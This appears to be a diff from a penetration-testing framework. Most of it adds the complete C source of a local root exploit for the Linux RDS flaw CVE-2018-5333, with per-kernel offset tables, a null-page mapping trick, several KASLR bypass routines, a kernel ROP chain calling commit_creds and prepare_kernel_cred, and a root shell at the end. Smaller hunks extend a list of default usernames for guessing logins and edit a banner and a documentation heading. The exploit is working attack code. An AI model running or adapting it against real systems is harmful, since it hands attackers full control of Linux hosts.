+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -15,7 +15,7 @@
                      :<script>.Ac816/                        sENbove3101.404:    
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
-                      :hvensntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
                      :#OUTHOUSE-  -s:                       /corykennedyData:    
                      :$nmap -oS                              SSo.6178306Ence:    
                      :Awsm.da:                            /shMTl#beats3o.No.:    
@@ -1,88 +1,131 @@

 4Dgifts
-EZsetup
-OutOfBox
-ROOT
+abrt
 adm
 admin
 administrator
 anon
+_apt
+arpwatch
 auditor
 avahi
 avahi-autoipd
 backup
 bbs
+beef-xss
 bin
+bitnami
 checkfs
 checkfsys
 checksys
 chronos
+chrony
 cmwlogin
+cockpit-ws
+colord
 couchdb
+cups-pk-helper
 daemon
 dbadmin
+dbus
+Debian-exim
+Debian-snmp
 demo
 demos
 diag
 distccd
 dni
+dnsmasq
+dradis
+EZsetup
 fal
 fax
 ftp
 games
 gdm
+geoclue
 gnats
+gnome-initial-setup
 gopher
 gropher
 guest
 haldaemon
 halt
 hplip
+inetsim
 informix
 install
+iodine
 irc
+jet
 karaf
 kernoops
+king-phisher
+landscape
+libstoragemgmt
 libuuid
+lightdm
 list
 listen
 lp
 lpadm
 lpadmin
+lxd
 lynx
 mail
 man
 me
 messagebus
+miredo
 mountfs
 mountfsys
 mountsys
+mysql
 news
 noaccess
 nobody
 nobody4
+ntp
 nuucp
+nxautomation
 nxpgsql
+omi
+omsagent
 operator
 oracle
+OutOfBox
 pi
+polkitd
+pollinate
 popr
+postfix
 postgres
 postmaster
 printer
 proxy
 pulse
+redsocks
 rfindd
 rje
 root
+ROOT
 rooty
+rpc
+rpcuser
+rtkit
+rwhod
 saned
 service
+setroubleshoot
 setup
 sgiweb
+shutdown
 sigver
 speech-dispatcher
 sshd
+sslh
+sssd
+stunnel4
 sym
 symop
 sync
@@ -92,22 +135,34 @@ sysadmin
 sysbin
 syslog
 system_admin
+systemd-bus-proxy
+systemd-coredump
+systemd-network
+systemd-resolve
+systemd-timesync
+tcpdump
 trouble
+tss
 udadmin
 ultra
 umountfs
 umountfsys
 umountsys
 unix
+unscd
 us_admin
+usbmux
 user
 uucp
 uucpadm
+uuidd
+vagrant
+varnish
 web
 webmaster
+whoopsie
 www
 www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -56,7 +56,7 @@ All of the leaked versions are available in the module

 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?

-## Verification
+## Verification Steps

 - Start `msfconsole`
